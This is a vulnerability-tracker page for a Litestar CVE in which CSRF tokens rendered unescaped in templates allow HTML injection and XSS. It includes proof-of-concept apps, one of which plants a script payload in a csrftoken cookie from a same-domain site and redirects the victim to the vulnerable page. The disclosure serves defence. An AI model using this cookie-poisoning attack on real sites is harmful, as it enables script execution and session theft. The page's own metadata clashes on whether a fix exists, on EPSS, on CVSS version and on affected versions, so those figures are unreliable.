CVE-2026-48060

HIGHPre-NVD 8.18.1
EchelonGraph scoreLOW confidence

This high-severity CVE scores 8.1 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit probability: 0.0%, top 91% of all CVEs by exploit prediction. GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m, epss
8.1
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: 0%CVSS: 8.1Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Litestar has HTML Injection Through its CSRF Token

Overview

Litestar instances which use a template engine in conjunction with CSRF protection are vulnerable to HTML Injection which can be escalated to Cross Site Scripting due to the contents of the CSRF cookie being excluded from automatic escaping by the template engine when configured inline with documentation recommendations.

We used the latest Litestar version available via PyPI for this disclosure. At the time of writing, that is version 2.21.0 and we have not validated this against the current latest commit on the main branch.

Special Configurations Required

For a web application to be vulnerable to this issue, it must:

  • Use templates to render the content which is returned to the user (e.g. Jinja, Mako, MiniJinja)
  • Have CSRF protection enabled
  • Have CSRF inputs enabled (i.e. a hidden form field which contains the CSRF token)

Links to relevant documentation for the above configurations:

  • https://docs.litestar.dev/2/usage/templating.html
  • https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
  • https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs

Reproduction Steps

  • Visit an application which contains a form, uses templating, has CSRF protection enabled, and which inserts the CSRF token as a hidden input field on forms. A proof of concept application demonstrating this configuration is included later in this disclosure for ease of reproduction.
  • Observe that the server sets the csrftoken cookie when the page loads.
  • Set the value of the csrftoken cookie to ">HTML Injection Test.
  • Refresh the page.
  • Observe that the contents of the cookie is rendered on the page.

Exploit Code

There are two Proof-of-Concepts (PoC) included here. The first demonstrates that arbitrary HTML is injected into the page when the user supplies a malicious csrftoken cookie. The second demonstrates how an attacker could deliver an attack using the vulnerability to an unsuspecting user.

The proof-of-concept applications can be started using these commands:

# run poc1
python -m uvicorn poc1:app

run poc2

python -m uvicorn poc2:app

PoC 1 - Minimum Vulnerable Application

This proof-of-concept demonstrates that a crafted csrftoken cookie will be rendered on the vulnerable page as HTML.

poc1.py

from litestar import Litestar, get, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig

@get("/") async def hello_world() -> Template: return Template( template_name="test.jinja", media_type=MediaType.HTML, )

ENVIRONMENT = jinja2.Environment( loader=jinja2.FileSystemLoader( searchpath=os.path.join(os.path.dirname(__file__), "templates") ), autoescape=True, )

csrf_config = CSRFConfig(secret="my_super_duper_secret")

app = Litestar( route_handlers=[hello_world], template_config=TemplateConfig( directory=Path("templates"), engine=JinjaTemplateEngine.from_environment(ENVIRONMENT), ), csrf_config=csrf_config, )

test.jinja

{{ csrf_input | safe }}
                Username:
                
                Password:

Sending the following request to the vulnerable page will result in the HTML included in the csrftoken cookie being injected and rendered on the page.

GET /vulnerable HTTP/1.1
Host: localhost:8000
Cookie: csrftoken=">HTML Injection Test

PoC 2 - Simulated Attack Delivery

This proof-of-concept demonstrates how an attacker could deliver an attack using this vulnerability to an unsuspecting user. We are using this example as it provides for easy local reproduction, it is possible that in end applications there may be various ways to trigger this vulnerability which differ from the example provided.

First, the user must visit a malicious application (the /first_site endpoint in poc2.py) which sets the csrftoken cookie value to a malicious payload. This app must be hosted on the *same top level domain* as the vulnerable application so that the poisoned cookie will automatically be sent by the user's browser to the vulnerable page.

Next, the malicious app *redirects* the user to the vulnerable app (the /second_site endpoint in poc2.py). The victim's browser will automatically send the poisoned cookie to the vulnerable app. This causes the vulnerable application to unsafely write the cookie content to the page and return it to the user, executing the attack in the victim user's browser

poc2.py

from litestar import Litestar, get, post, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
from litestar.datastructures import Cookie
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig

cookie_payload = '">alert(document.domain)'

malicious site which poisons the csrf cookie

@get("/first_site", response_cookies=[Cookie(key="csrftoken", value=cookie_payload, httponly=True)]) async def first_site() -> Template: return Template( template_name="page1.jinja", media_type=MediaType.HTML, )

vulnerable site

@get("/second_site") async def second_site() -> Template: return Template( template_name="page2.jinja", media_type=MediaType.HTML, )

example function for form submission if csrf verification succeeds

@post("/form_receive") async def handle_form() -> dict[str, str]: return { "message": "form data received successfully" }

ENVIRONMENT = jinja2.Environment( loader=jinja2.FileSystemLoader( searchpath=os.path.join(os.path.dirname(__file__), "templates") ), autoescape=True, )

csrf_config = CSRFConfig(secret="my_super_duper_secret")

app = Litestar( route_handlers=[first_site, second_site, handle_form], template_config=TemplateConfig( directory=Path("templates"), engine=JinjaTemplateEngine.from_environment(ENVIRONMENT), ), csrf_config=csrf_config, )

page1.jinja

Setting cookie...
        
            setTimeout(() => {
                window.location.href="/second_site"
            }, 2000);

page2.jinja

{{ csrf_input | safe }}
                Username:
                
                Password:

Impact

This vulnerability affects all Litestar instances that use templates along with CSRF protection that has been configured inline with the documentation section of "Adding CSRF inputs" within the "Templating" page. An attacker that can successfully exploit this issue can inject arbitrary HTML tags into the page which is then rendered in the victim user's browser. This includes script tags, allowing the attacker to escalate the attack to a Cross Site Scripting attack, thus executing arbitrary JavaScript code in the victim's browser.

Depending on the configuration of the site, this could result in the theft of cookies or session tokens. This issue can also allow the attacker to change the appearance of the site. This could enable possible phishing attacks by injecting fake forms into the page or even skimming the information that a user enters into a legitimate form.

Resources

  • https://cwe.mitre.org/data/definitions/79.html
  • https://docs.litestar.dev/2/usage/templating.html
  • https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
  • https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs

CVSS v3
8.1
EG Score
8.1(low)
EPSS
9.3%
KEV
Not listed

Published

June 10, 2026

Last Modified

June 10, 2026

Vendor Advisories for CVE-2026-48060(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
litestar1.0.0a0 ... 2.9.1 (62 versions)2.22.0

Data Freshness Timeline

(refreshed 11× in last 7d / 50× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 03:31 UTCEG score recompute
  2. 2026-07-05 15:08 UTCEG score recompute
  3. 2026-07-05 01:56 UTCEG score recompute
  4. 2026-07-04 12:47 UTCEG score recompute
  5. 2026-07-03 23:21 UTCEG score recompute
  6. 2026-07-03 09:49 UTCEG score recompute
  7. 2026-07-02 20:40 UTCEG score recompute
  8. 2026-07-02 07:30 UTCEG score recompute
  9. 2026-07-01 18:20 UTCEG score recompute
  10. 2026-07-01 05:11 UTCEG score recompute
  11. 2026-06-30 15:19 UTCEG score recompute
  12. 2026-06-30 01:56 UTCEG score recompute
  13. 2026-06-29 12:47 UTCEG score recompute
  14. 2026-06-28 23:37 UTCEG score recompute
  15. 2026-06-28 10:28 UTCEG score recompute
  16. 2026-06-27 21:02 UTCEG score recompute
  17. 2026-06-27 07:53 UTCEG score recompute
  18. 2026-06-26 18:44 UTCEG score recompute
  19. 2026-06-26 05:23 UTCEG score recompute
  20. 2026-06-25 16:14 UTCEG score recompute
  21. 2026-06-25 03:04 UTCEG score recompute
  22. 2026-06-24 13:55 UTCEG score recompute
  23. 2026-06-24 00:46 UTCEG score recompute
  24. 2026-06-23 11:31 UTCEG score recompute
  25. 2026-06-22 22:11 UTCEG score recompute
Show 25 more
  1. 2026-06-22 08:58 UTCEG score recompute
  2. 2026-06-21 19:46 UTCEG score recompute
  3. 2026-06-21 06:33 UTCEG score recompute
  4. 2026-06-20 17:21 UTCEG score recompute
  5. 2026-06-20 04:12 UTCEG score recompute
  6. 2026-06-19 14:37 UTCEG score recompute
  7. 2026-06-19 01:23 UTCEG score recompute
  8. 2026-06-18 12:12 UTCEG score recompute
  9. 2026-06-17 22:49 UTCEG score recompute
  10. 2026-06-17 09:40 UTCEG score recompute
  11. 2026-06-16 20:30 UTCEG score recompute
  12. 2026-06-16 07:20 UTCEG score recompute
  13. 2026-06-15 18:11 UTCEG score recompute
  14. 2026-06-15 04:30 UTCEG score recompute
  15. 2026-06-14 23:18 UTCEPSS rescore
  16. 2026-06-14 15:21 UTCEG score recompute
  17. 2026-06-14 02:12 UTCEG score recompute
  18. 2026-06-13 23:00 UTCEPSS rescore
  19. 2026-06-13 13:03 UTCEG score recompute
  20. 2026-06-12 23:53 UTCEG score recompute
  21. 2026-06-12 23:12 UTCEPSS rescore
  22. 2026-06-12 10:44 UTCEG score recompute
  23. 2026-06-11 21:35 UTCEG score recompute
  24. 2026-06-11 08:26 UTCEG score recompute
  25. 2026-06-10 19:17 UTCEG score recompute

Frequently asked(5)

What is CVE-2026-48060?
CVE-2026-48060 is a high vulnerability published on June 10, 2026. Litestar has HTML Injection Through its CSRF Token Overview Litestar instances which use a template engine in conjunction with CSRF protection are vulnerable to HTML Injection which can be escalated to Cross Site Scripting due to the contents of the CSRF cookie being excluded from automatic…
When was CVE-2026-48060 disclosed?
CVE-2026-48060 was first published in the National Vulnerability Database on June 10, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
Is CVE-2026-48060 actively exploited?
CVE-2026-48060 is not currently on CISA's Known Exploited Vulnerabilities catalog. FIRST EPSS estimates a 9.3% percentile likelihood of exploitation in the next 30 days — higher percentiles indicate greater predicted risk.
What is the CVSS score of CVE-2026-48060?
CVE-2026-48060 has a CVSS v4.0 base score of 8.1 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-48060?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48060, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-48060

Explore →

Is Your Infrastructure Affected by CVE-2026-48060?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.